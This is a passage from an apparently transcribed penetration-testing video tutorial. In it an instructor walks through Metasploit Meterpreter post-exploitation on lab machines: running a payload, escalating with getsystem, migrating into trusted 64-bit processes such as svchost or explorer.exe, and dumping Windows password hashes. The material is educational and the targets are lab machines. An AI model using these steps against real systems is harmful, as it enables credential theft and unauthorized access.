this one. If you want to migrate to system 32-bit svc host, and choose this one. This is how the things are working here. Okay, see, there is a system root is there. If you want to migrate to here, simple, you just need to use this one. Okay, now let me, what I told you, let me migrate to low network, I think, right? Local network services. Okay, what is id here? 1768. Just type here migrate. Okay, now just type here ps again. See, the things are completely changed. Now if I type here sysinf get uid, there is a anti-authority network services. If I type here help and let me dump the hash dump. Okay, just type here hash dump. Here you guys can't able to capture the passwords because it's a different stuffs. Okay, it's a different user where it doesn't have the password. You need to think like this. Okay, sorry guys, if I navigate to this one, then again I need to go back. Okay, I need to select the anti-authority or system, then I need to do the whole process there. Okay, so this is a thing. So the simple thing is, you no need to worry here. Just try to jump to anti-authority system and just and migrate to svc host or explorer or something like that. Okay, a target a migrate to trusted applications. Okay, basically this one explorer.exe is a trusted one, svc host is a trusted one. Just migrate to that one. Okay, so right now we successfully dumped the password of windows 7. You guys do the same process for windows 10 as well. Okay, this is a thing. Let me close this and let me dump the password of this one as well. Okay, where it is, metasploitable 3. The same issue you will see. Okay, here also. Let me close this one because I don't want this. Let me set up the whole listener. I just closed that one. And let me log in as an administrator here. Now, if I click on the downloads, there is a payload, right? There is a Shika. Let me run this. See, it will execute as an administrator because this is an administrator user. Okay. I got the connection. Just type here what? Sys info. First of all, you need to check architecture is 86-bit. Okay. Help. Just type here hash dump. It can't able to dump the hashes here. Okay. If I type here get system, I'm not using suggester here. Simple, because it's a vulnerable system, so that's why I'm using this one. Okay. Just type here get system. Okay, it's successfully performed the steps there. And let me type here hash dump. Still it's can't able to perform the hashes. It can't able to dump the hashes. Let me migrate to 64-bit. Okay, let me change my meter payload architecture to what? 64-bit. Just type here ps. Let me target the 64-bit application which is in anti-authority system. There is a, just let me see, con system is let me migrate to Ruby. Okay, what is this ID 4140? The application, the Ruby application architecture is what? x64-bit. Okay, now just type here migrate. Just paste the number there. Just type enter. Okay, now just type here sysinfo. Right now my meter architecture is 64-bit. Now simple, just type here help. Let me type here hash dump. It will work. See, let me copy it. Even after performing the privilege escalation, due to this architecture issue, I can't able to dump the passwords. Okay, this is a thing. So that's why I didn't cover this all stuffs in the beginning. Okay, because you will get kind of confusions. Okay, so this is a very easy process. You no need to worry. Again, I am saying you just need to migrate to any 64-bit application. Okay, after performing the privilege escalation, just migrate to any 64-bit application. Okay, then you guys can able to do